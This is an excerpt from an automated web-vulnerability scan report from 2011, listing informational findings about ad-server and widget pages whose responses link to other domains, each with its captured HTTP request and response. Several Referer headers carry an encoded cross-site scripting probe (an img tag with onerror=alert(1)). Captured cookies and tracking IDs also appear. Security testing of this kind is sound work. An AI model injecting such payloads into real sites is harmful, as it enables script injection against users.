<a href="http://g.msn.com/2AD0004Q/4000000000043978.1??PID=8750829&UIT=G&TargetID=34931985&AN=188435110&PG=CMS3TL&ASID=b3605fd4bb9e43c99287e318ca7db4d0" target="_blank"><img src="http://ads2.msads.net/CIS/3/000/000/000/016/847.gif" width="728" height="90" alt="Ad - Safari" border="0" /></a>
...[SNIP]...

18.106. http://rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&ID=3320E7738B0764152F29E55B8F07641E&MUID=3320E7738B0764152F29E55B8F07641E&PG=CMS3TL&AP=1390

The response contains the following link to another domain:

http://ads2.msads.net/CIS/62/000/000/000/015/867.jpg

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&ID=3320E7738B0764152F29E55B8F07641E&MUID=3320E7738B0764152F29E55B8F07641E&PG=CMS3TL&AP=1390 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://social.msdn.microsoft.com/Search/en-USebb6e%20a%3db2dac2458762?query=84e17%3Cimg%2520src%253da%2520onerror%253dalert(1)%3E8704c19d382%3D1&Refinement=123&ac=8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.msn.com
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=66ef802b93654512ad8f2c9459d99579; mh=MSFT; CC=US; CULTURE=EN-US; Sample=37; MUID=3320E7738B0764152F29E55B8F07641E

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 841
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8955243-T52065366-C60000000000051348
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Sat, 23 Jul 2011 04:54:05 GMT
Content-Length: 841

//<![CDATA[
function getRADIds() { return{"adid":"60000000000051348","pid":"8955243","targetid":"52065366"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);}
t
...[SNIP]...
<a href="http://g.msn.com/2AD00052/60000000000051348.1??PID=8955243&UIT=G&TargetID=52065366&AN=169476458&PG=CMS3TL&ASID=b0d022deb6ae4eb8a8bddefce04018f5" target="_blank"><img src="http://ads2.msads.net/CIS/62/000/000/000/015/867.jpg" width="728" height="90" alt="Ad - Diskeeper" border="0" /></a>
...[SNIP]...

18.107. http://rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&ID=3320E7738B0764152F29E55B8F07641E&MUID=3320E7738B0764152F29E55B8F07641E&PG=CMS3TL&AP=1390

The response contains the following links to other domains:

http://clk.atdmt.com/MRT/go/332665930/direct;;wi.728;hi.90/01/
http://view.atdmt.com/MRT/iview/332665930/direct;;wi.728;hi.90/01?click=
http://view.atdmt.com/MRT/view/332665930/direct;;wi.728;hi.90/01/

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&ID=3320E7738B0764152F29E55B8F07641E&MUID=3320E7738B0764152F29E55B8F07641E&PG=CMS3TL&AP=1390 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://social.msdn.microsoft.com/Search/en-US/en-USebb6e?query=xss&beta=0&ac=8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.msn.com
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=66ef802b93654512ad8f2c9459d99579; mh=MSFT; CC=US; CULTURE=EN-US; Sample=37; MUID=3320E7738B0764152F29E55B8F07641E

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2401
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8809150-T20670737-C93000000000051724
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Sat, 23 Jul 2011 04:54:19 GMT
Content-Length: 2401

//<![CDATA[
function getRADIds() { return{"adid":"93000000000051724","pid":"8809150","targetid":"20670737"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_690637523() {var adCode_690637523=new Array();adCode_690637523.push('<iframe src="http://view.atdmt.com/MRT/iview/332665930/direct;;wi.728;hi.90/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">\n');adCode_690637523.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_690637523.push('document.write(\'<a href="http://clk.atdmt.com/MRT/go/332665930/direct;;wi.728;hi.90/01/" target="_blank"><img src="http://view.atdmt.com/MRT/view/332665930/direct;;wi.728;hi.90/01/"/></a>
...[SNIP]...

18.108. http://rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&ID=1FDD375D440B439987A467BECD35D2C6&MUID=1FDD375D440B439987A467BECD35D2C6&PG=CMS3TL&AP=1390

The response contains the following link to another domain:

http://ads2.msads.net/CIS/58/000/000/000/012/690.jpg

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 866
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P6248799-T20672229-C85000000000073326
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Sat, 23 Jul 2011 04:45:37 GMT
Content-Length: 866

//<![CDATA[
function getRADIds() { return{"adid":"85000000000073326","pid":"6248799","targetid":"20672229"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);}
t
...[SNIP]...
<a href="http://g.msn.com/2AD00052/85000000000073326.1??PID=6248799&UIT=G&TargetID=20672229&AN=1646480380&PG=CMS3TL&ASID=526efc0211e641bc90a712bb057a1b8e" target="_blank"><img src="http://ads2.msads.net/CIS/58/000/000/000/012/690.jpg" width="728" height="90" alt="Microsoft Store: Hot Deal, Cool Stuff" border="0" /></a>
...[SNIP]...

18.109. http://rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&ID=1FDD375D440B439987A467BECD35D2C6&MUID=1FDD375D440B439987A467BECD35D2C6&PG=CMS3TL&AP=1390

The response contains the following link to another domain:

http://ads2.msads.net/CIS/103/000/000/000/012/748.jpg

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&ID=1FDD375D440B439987A467BECD35D2C6&MUID=1FDD375D440B439987A467BECD35D2C6&PG=CMS3TL&AP=1390 HTTP/1.1
Host: rad.msn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://social.msdn.microsoft.com/search/en-US?query=84e17%3cimg%2520src%253da%2520onerror%253dalert%281%29%3e8704c19d382%3d1
Cookie: MC1=V=3&GUID=af7f3bc9414d4d7f98f7762d0ecd4c67; CULTURE=EN-US; MSNRPSShare=1; MUID=1FDD375D440B439987A467BECD35D2C6

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 865
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P6248799-T20672229-C30000000000051592
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Sat, 23 Jul 2011 04:46:14 GMT
Content-Length: 865

//<![CDATA[
function getRADIds() { return{"adid":"30000000000051592","pid":"6248799","targetid":"20672229"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);}
t
...[SNIP]...
<a href="http://g.msn.com/2AD00052/30000000000051592.1??PID=6248799&UIT=G&TargetID=20672229&AN=941179490&PG=CMS3TL&ASID=3da0e5197fa24ae9b8acd8f0111fa665" target="_blank"><img src="http://ads2.msads.net/CIS/103/000/000/000/012/748.jpg" width="728" height="90" alt="Microsoft Store: Hot Deal, Cool Stuff" border="0" /></a>
...[SNIP]...

18.110. http://rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&ID=E361C23374E642C998D8ABA7166A75EC&MUID=E361C23374E642C998D8ABA7166A75EC&PG=CMSHPA&AP=1390

The response contains the following links to other domains:

http://clk.atdmt.com/MRT/go/330126004/direct;;wi.728;hi.90/01/
http://view.atdmt.com/MRT/iview/330126004/direct;;wi.728;hi.90/01?click=
http://view.atdmt.com/MRT/view/330126004/direct;;wi.728;hi.90/01/

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2415
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8970946-T38644085-C78000000000047316
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Thu, 21 Jul 2011 20:07:43 GMT
Content-Length: 2415

//<![CDATA[
function getRADIds() { return{"adid":"78000000000047316","pid":"8970946","targetid":"38644085"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_2030568311() {var adCode_2030568311=new Array();adCode_2030568311.push('<iframe src="http://view.atdmt.com/MRT/iview/330126004/direct;;wi.728;hi.90/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">\n');adCode_2030568311.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_2030568311.push('document.write(\'<a href="http://clk.atdmt.com/MRT/go/330126004/direct;;wi.728;hi.90/01/" target="_blank"><img src="http://view.atdmt.com/MRT/view/330126004/direct;;wi.728;hi.90/01/"/></a>
...[SNIP]...

18.111. http://rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&ID=3320E7738B0764152F29E55B8F07641E&MUID=3320E7738B0764152F29E55B8F07641E&PG=CMS3DB&AP=1089

The response contains the following link to another domain:

http://ads2.msads.net/CIS/88/000/000/000/013/890.jpg

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&ID=3320E7738B0764152F29E55B8F07641E&MUID=3320E7738B0764152F29E55B8F07641E&PG=CMS3DB&AP=1089 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://msdn.microsoft.com/en-us/ms348103.aspx
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.msn.com
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=66ef802b93654512ad8f2c9459d99579; mh=MSFT; CC=US; CULTURE=EN-US; Sample=37; MUID=3320E7738B0764152F29E55B8F07641E

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 856
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8905941-T30595010-C82000000000063854
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Sat, 23 Jul 2011 04:54:32 GMT
Content-Length: 856

//<![CDATA[
function getRADIds() { return{"adid":"82000000000063854","pid":"8905941","targetid":"30595010"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);}

...[SNIP]...
<a href="http://g.msn.com/2AD00043/82000000000063854.1??PID=8905941&UIT=G&TargetID=30595010&AN=288506275&PG=CMS3DB&ASID=098d75ec59af4917ab347e2409cea68e" target="_blank"><img src="http://ads2.msads.net/CIS/88/000/000/000/013/890.jpg" width="300" height="250" alt="Advertising - Pluralsight" border="0" /></a>
...[SNIP]...

18.112. http://rd.apmebf.com/w/get.media previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rd.apmebf.com
Path:	/w/get.media

Issue detail

The page was loaded from a URL containing a query string:

http://rd.apmebf.com/w/get.media?sid=38735&m=1&tp=5&d=j&t=n&host=media.fastclick.net

The response contains the following link to another domain:

http://media.fastclick.net/w/get.media?sid=38735&m=1&tp=5&d=j&t=n&no_cj_c=0&upsid=571814024282

Request

Response

18.113. http://scmagazineus.disqus.com/combination_widget.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scmagazineus.disqus.com
Path:	/combination_widget.js

Issue detail

The page was loaded from a URL containing a query string:

http://scmagazineus.disqus.com/combination_widget.js?num_items=5&hide_mods=0&color=grey&default_tab=recent&excerpt_length=200

The response contains the following links to other domains:

http://spohnsolutions.com/2011/07/20/reddit-founder-accused-of-ip-theft/
http://www.scmagazineus.com/best-enterprise-firewall/article/196005/
http://www.scmagazineus.com/fbi-probes-possible-murdoch-phone-hacking-in-us/article/207766/
http://www.scmagazineus.com/reddit-co-founder-charged-with-intrusion-data-theft/article/207842/
http://www.scmagazineus.com/report-says-firms-must-rethink-patching-strategy/article/207478/
http://www.scmagazineus.com/the-case-for-articulating-security-risk-in-a-down-economy/article/207267/
http://www.scmagazineus.com/ucla-health-system-fined-over-celebrity-patient-snooping/article/207214/
http://www.scmagazineus.com/visa-heartland-rbs-worldpay-no-longer-pci-compliant/article/128762/
http://www.scmagazineus.com/zeus-for-android-steals-one-time-banking-passwords/article/207286/

Request

GET /combination_widget.js?num_items=5&hide_mods=0&color=grey&default_tab=recent&excerpt_length=200 HTTP/1.1
Host: scmagazineus.disqus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
Cookie: __qca=P0-1994503427-1305051999515; __utma=113869458.845816757.1311276304.1311276304.1311276304.1; __utmz=113869458.1311276304.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Content-Length: 14231
Date: Fri, 22 Jul 2011 20:13:14 GMT
X-Varnish: 852951183 852477574
Age: 525
Via: 1.1 varnish
Connection: close

function dsqComboTab(tab) {
   document.getElementById('dsq-combo-people').style.display = "none";
   document.getElementById('dsq-combo-popular').style.display = "none";
   document.getElementById('dsq-
...[SNIP]...
<p class="dsq-widget-meta"><a href="http://www.scmagazineus.com/report-says-firms-must-rethink-patching-strategy/article/207478/">Report says firms must rethink patching strategy - SC Magazine US</a> · <a href="http://www.scmagazineus.com/report-says-firms-must-rethink-patching-strategy/article/207478/#comment-259080201">1 day ago</a>
...[SNIP]...
<p class="dsq-widget-meta"><a href="http://www.scmagazineus.com/visa-heartland-rbs-worldpay-no-longer-pci-compliant/article/128762/">Visa: Heartland, RBS WorldPay no longer PCI compliant - SC Magazine US</a> · <a href="http://www.scmagazineus.com/visa-heartland-rbs-worldpay-no-longer-pci-compliant/article/128762/#comment-259064638">2 days ago</a>
...[SNIP]...
<span class="dsq-widget-comment">Read an interesting take on this whole legal show here: <a href="http://spohnsolutions.com/2011/07/20/reddit-founder-accused-of-ip-theft/" rel="nofollow">http://spohnsolutions.com/2011...</a>
...[SNIP]...
<p class="dsq-widget-meta"><a href="http://www.scmagazineus.com/reddit-co-founder-charged-with-intrusion-data-theft/article/207842/">Reddit co-founder charged with intrusion, data theft - SC Magazine US</a> · <a href="http://www.scmagazineus.com/reddit-co-founder-charged-with-intrusion-data-theft/article/207842/#comment-259024632">2 days ago</a>
...[SNIP]...
<p class="dsq-widget-meta"><a href="http://www.scmagazineus.com/fbi-probes-possible-murdoch-phone-hacking-in-us/article/207766/">FBI probes possible Murdoch phone hacking in U.S. - SC Magazine US</a> · <a href="http://www.scmagazineus.com/fbi-probes-possible-murdoch-phone-hacking-in-us/article/207766/#comment-256704863">3 days ago</a>
...[SNIP]...
<p class="dsq-widget-meta"><a href="http://www.scmagazineus.com/best-enterprise-firewall/article/196005/">Best Enterprise Firewall - SC Magazine US</a> · <a href="http://www.scmagazineus.com/best-enterprise-firewall/article/196005/#comment-254318293">5 days ago</a>
...[SNIP]...
<li class="dsq-clearfix">\
    <a class="dsq-widget-thread" href="http://www.scmagazineus.com/reddit-co-founder-charged-with-intrusion-data-theft/article/207842/">Reddit co-founder charged with intrusion, data theft - SC Magazine US</a>
...[SNIP]...
<li class="dsq-clearfix">\
    <a class="dsq-widget-thread" href="http://www.scmagazineus.com/the-case-for-articulating-security-risk-in-a-down-economy/article/207267/">The case for articulating security risk in a down economy - SC Magazine US</a>
...[SNIP]...
<li class="dsq-clearfix">\
    <a class="dsq-widget-thread" href="http://www.scmagazineus.com/fbi-probes-possible-murdoch-phone-hacking-in-us/article/207766/">FBI probes possible Murdoch phone hacking in U.S. - SC Magazine US</a>
...[SNIP]...
<li class="dsq-clearfix">\
    <a class="dsq-widget-thread" href="http://www.scmagazineus.com/zeus-for-android-steals-one-time-banking-passwords/article/207286/">Zeus for Android steals one-time banking passwords - SC Magazine US</a>
...[SNIP]...
<li class="dsq-clearfix">\
    <a class="dsq-widget-thread" href="http://www.scmagazineus.com/ucla-health-system-fined-over-celebrity-patient-snooping/article/207214/">UCLA Health System fined over celebrity patient snooping - SC Magazine US</a>
...[SNIP]...

18.114. http://showadsak.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://showadsak.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The page was loaded from a URL containing a query string:

http://showadsak.pubmatic.com/AdServer/AdServerServlet?operId=2&pubId=25659&siteId=26922&adId=21908&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://www.myyearbook.com/advertising/default.php&frameName=http_www_myyearbook_comadvertisingdefault_phpkomli_ads_frame12565926922&kltstamp=2011-6-21%2013%3A1%3A0&ranreq=0.5989337249714323&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0

The response contains the following links to other domains:

http://pixel.quantserve.com/pixel/p-5aWVS_roA1dVM.gif?labels=Social_Networking
http://www.myyearbook.com/advertising/default.php?n=Pubmatic&section=None&size=728x90&site=MYB

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25659&siteId=26922&adId=21908&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://www.myyearbook.com/advertising/default.php&frameName=http_www_myyearbook_comadvertisingdefault_phpkomli_ads_frame12565926922&kltstamp=2011-6-21%2013%3A1%3A0&ranreq=0.5989337249714323&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network
Cookie: KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; KRTBCOOKIE_32=1386-WH9qZFd2QnVEAmJeAgd%2FWAJUaXsQdwNPC11gUlpOZQ%3D%3D; PUBRETARGET=2114_1326806725.82_1405863486; KRTBCOOKIE_22=488-pcv:1|uid:4146544210108361256

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1441
Date: Thu, 21 Jul 2011 18:00:54 GMT
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Fri, 20-Jul-2012 18:00:54 GMT; path=/
Set-Cookie: pubfreq_26922=; domain=pubmatic.com; expires=Sat, 23-Jul-2011 18:00:54 GMT; path=/
Set-Cookie: pubtime_26922=TMC; domain=pubmatic.com; expires=Fri, 22-Jul-2011 18:00:54 GMT; path=/
Set-Cookie: pubfreq_26922_21908_683019572=165-1; domain=pubmatic.com; expires=Thu, 21-Jul-2011 18:40:54 GMT; path=/
Set-Cookie: PMDTSHR=; domain=pubmatic.com; expires=Fri, 22-Jul-2011 18:00:54 GMT; path=/

document.write('<div id="http_www_myyearbook_comadvertisingdefault_phpkomli_ads_frame12565926922" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdat
...[SNIP]...
</div>');
document.writeln('<iframe src="http://www.myyearbook.com/advertising/default.php?n=Pubmatic&section=None&size=728x90&site=MYB" width=728 height=90 Marginwidth=0 Marginheight=0 Hspace=0 Vspace=0 Frameborder=0 Scrolling=No></iframe>
...[SNIP]...
</iframe>');document.writeln('<img src="http://pixel.quantserve.com/pixel/p-5aWVS_roA1dVM.gif?labels=Social_Networking" style="display: none;position:absolute;top:-15000px;" border="0" height="1" width="1" alt="Quantcast"/>');

18.115. http://silverpopweb01.beacontec.com/blogs/email-marketing/wp-content/plugins/google/css/plusone.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://silverpopweb01.beacontec.com
Path:	/blogs/email-marketing/wp-content/plugins/google/css/plusone.css

Issue detail

The page was loaded from a URL containing a query string:

http://silverpopweb01.beacontec.com/blogs/email-marketing/wp-content/plugins/google/css/plusone.css?ver=3.1.3

The response contains the following links to other domains:

http://apis.google.com/js/plusone.js
http://feedburner.google.com/fb/a/mailverify?uri=QuietRevolutionInEmailMarketing&loc=en_US
http://platform.twitter.com/widgets.js
http://www.silverpop.com/
http://www.silverpop.com/blogs/email-marketing
http://www.silverpop.com/blogs/email-marketing/
http://www.silverpop.com/blogs/email-marketing/2011-emea-client-conference-one-for-the-record-books.html
http://www.silverpop.com/blogs/email-marketing/about-the-authors
http://www.silverpop.com/blogs/email-marketing/category/b2b-marketing
http://www.silverpop.com/blogs/email-marketing/category/behavioral-targeting
http://www.silverpop.com/blogs/email-marketing/category/data-segmentation
http://www.silverpop.com/blogs/email-marketing/category/deliverability
http://www.silverpop.com/blogs/email-marketing/category/demand-generation
http://www.silverpop.com/blogs/email-marketing/category/email-creative
http://www.silverpop.com/blogs/email-marketing/category/email-marketing
http://www.silverpop.com/blogs/email-marketing/category/events
http://www.silverpop.com/blogs/email-marketing/category/lead-management
http://www.silverpop.com/blogs/email-marketing/category/marketing-automation
http://www.silverpop.com/blogs/email-marketing/category/metrics-analytics
http://www.silverpop.com/blogs/email-marketing/category/misc
http://www.silverpop.com/blogs/email-marketing/category/mobile
http://www.silverpop.com/blogs/email-marketing/category/multi-channel-marketing
http://www.silverpop.com/blogs/email-marketing/category/nurturing
http://www.silverpop.com/blogs/email-marketing/category/privacy-permission
http://www.silverpop.com/blogs/email-marketing/category/sales-marketing-alignment
http://www.silverpop.com/blogs/email-marketing/category/scoring
http://www.silverpop.com/blogs/email-marketing/category/social
http://www.silverpop.com/blogs/email-marketing/category/software-as-a-service
http://www.silverpop.com/blogs/email-marketing/category/trends
http://www.silverpop.com/blogs/email-marketing/comments/feed
http://www.silverpop.com/blogs/email-marketing/contact-the-authors
http://www.silverpop.com/blogs/email-marketing/dolphin-training-incentives.html
http://www.silverpop.com/blogs/email-marketing/feed
http://www.silverpop.com/blogs/email-marketing/feed/atom
http://www.silverpop.com/blogs/email-marketing/five-questions-simone-vincent-myvouchercodes-co-uk.html
http://www.silverpop.com/blogs/email-marketing/mocial-survey-3findings.html
http://www.silverpop.com/blogs/email-marketing/places-promote-email-program-during-holidays.html
http://www.silverpop.com/blogs/email-marketing/reporting-tools-5-questions.html
http://www.silverpop.com/blogs/email-marketing/silverpop-vendor-council-marketing-automation-institute.html
http://www.silverpop.com/blogs/email-marketing/tag/b2b-best-practices
http://www.silverpop.com/blogs/email-marketing/tag/b2b-buyer
http://www.silverpop.com/blogs/email-marketing/tag/b2b-buying-behavior
http://www.silverpop.com/blogs/email-marketing/tag/b2b-buying-process
http://www.silverpop.com/blogs/email-marketing/tag/b2b-lead-management
http://www.silverpop.com/blogs/email-marketing/tag/b2b-marketing
http://www.silverpop.com/blogs/email-marketing/tag/b2b-marketing-content
http://www.silverpop.com/blogs/email-marketing/tag/b2b-marketing-university
http://www.silverpop.com/blogs/email-marketing/tag/b2b-sales
http://www.silverpop.com/blogs/email-marketing/tag/best-practices
http://www.silverpop.com/blogs/email-marketing/tag/buyer-centric
http://www.silverpop.com/blogs/email-marketing/tag/buyer-centric-marketing
http://www.silverpop.com/blogs/email-marketing/tag/buyer-dialogue
http://www.silverpop.com/blogs/email-marketing/tag/content-development
http://www.silverpop.com/blogs/email-marketing/tag/content-marketing
http://www.silverpop.com/blogs/email-marketing/tag/crm
http://www.silverpop.com/blogs/email-marketing/tag/deliverability
http://www.silverpop.com/blogs/email-marketing/tag/demand-generation
http://www.silverpop.com/blogs/email-marketing/tag/dialogue
http://www.silverpop.com/blogs/email-marketing/tag/email
http://www.silverpop.com/blogs/email-marketing/tag/email-marketing
http://www.silverpop.com/blogs/email-marketing/tag/email-marketing-best-practices
http://www.silverpop.com/blogs/email-marketing/tag/engagement-marketing
http://www.silverpop.com/blogs/email-marketing/tag/facebook
http://www.silverpop.com/blogs/email-marketing/tag/google
http://www.silverpop.com/blogs/email-marketing/tag/iphone
http://www.silverpop.com/blogs/email-marketing/tag/lead-management
http://www.silverpop.com/blogs/email-marketing/tag/lead-nurturing
http://www.silverpop.com/blogs/email-marketing/tag/lead-scoring
http://www.silverpop.com/blogs/email-marketing/tag/marketing
http://www.silverpop.com/blogs/email-marketing/tag/marketing-automation
http://www.silverpop.com/blogs/email-marketing/tag/marketing-channels
http://www.silverpop.com/blogs/email-marketing/tag/marketing-strategy
http://www.silverpop.com/blogs/email-marketing/tag/mobile
http://www.silverpop.com/blogs/email-marketing/tag/personas
http://www.silverpop.com/blogs/email-marketing/tag/privacy
http://www.silverpop.com/blogs/email-marketing/tag/relationships
http://www.silverpop.com/blogs/email-marketing/tag/relevance
http://www.silverpop.com/blogs/email-marketing/tag/roi
http://www.silverpop.com/blogs/email-marketing/tag/sales-marketing-alignment
http://www.silverpop.com/blogs/email-marketing/tag/sms
http://www.silverpop.com/blogs/email-marketing/tag/social-media
http://www.silverpop.com/blogs/email-marketing/tag/targeting
http://www.silverpop.com/blogs/email-marketing/tag/twitter
http://www.silverpop.com/blogs/email-marketing/tag/webinars
http://www.silverpop.com/blogs/email-marketing/top-500-retailer-survey-2011.html
http://www.silverpop.com/blogs/email-marketing/whereoware-abandoned-cart-campaign.html
http://www.silverpop.com/blogs/email-marketing/why-humanizing-content-is-important.html
http://www.silverpop.com/blogs/email-marketing/wp-content/plugins/google/css/plusone.css/page/2?ver=3.1.3

Request

GET /blogs/email-marketing/wp-content/plugins/google/css/plusone.css?ver=3.1.3 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
